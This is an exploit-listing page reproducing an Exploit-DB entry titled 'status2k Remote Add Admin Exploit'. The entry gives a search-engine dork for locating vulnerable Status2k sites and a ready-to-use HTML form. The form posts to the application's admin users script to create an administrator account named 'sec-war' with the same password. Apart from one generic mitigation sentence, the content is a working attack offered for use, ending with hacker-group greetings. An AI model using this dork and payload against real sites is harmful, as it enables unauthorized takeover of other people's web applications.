header-logo
Suggest Exploit
vendor:
Status2k
by:
alnjm33
N/A
CVSS
N/A
Remote Add Admin Exploit
N/A
CWE
Product Name: Status2k
Affected Version From: Version 1
Affected Version To: Version 1
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Version 1
N/A

status2k Remote Add Admin Exploit

This exploit allows an attacker to add an admin user to the Status2k application. The attacker can use the Dork (allinurl:dynamicimg.php) to find vulnerable sites and then use the HTML form to add an admin user with the username and password of 'sec-war'.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is properly configured and that all users have strong passwords.
Source

Exploit-DB raw data:

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : status2k Remote Add Admin Exploit
Author: alnjm33
Software Link: it cost 24.95 / y
Script Site : http://www.status2k.com/buynow.html
Version: 1
Tested on: Version 1
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
( allinurl:dynamicimg.php )
================================Exploit=============================================

<html>
<title>status2k Remote Add Admin</title>

<body link="#00FF00" text="#008000" bgcolor="#000000">

<form method="POST" action="http://server/Status2k/admin/options/users.php">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass : sec-war</b></p>
<p align="center"><b><font face="Comic Sans MS">
<a href="http://server/path//index.php?act=idx" style="text-decoration: none">
<font color="#00FF00">Security War</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text" name="adminuser" size="30" value="sec-war"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>

<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="sec-war"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>
=======================================================================================
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members

Navigation

Suggest Exploit

Services By CQR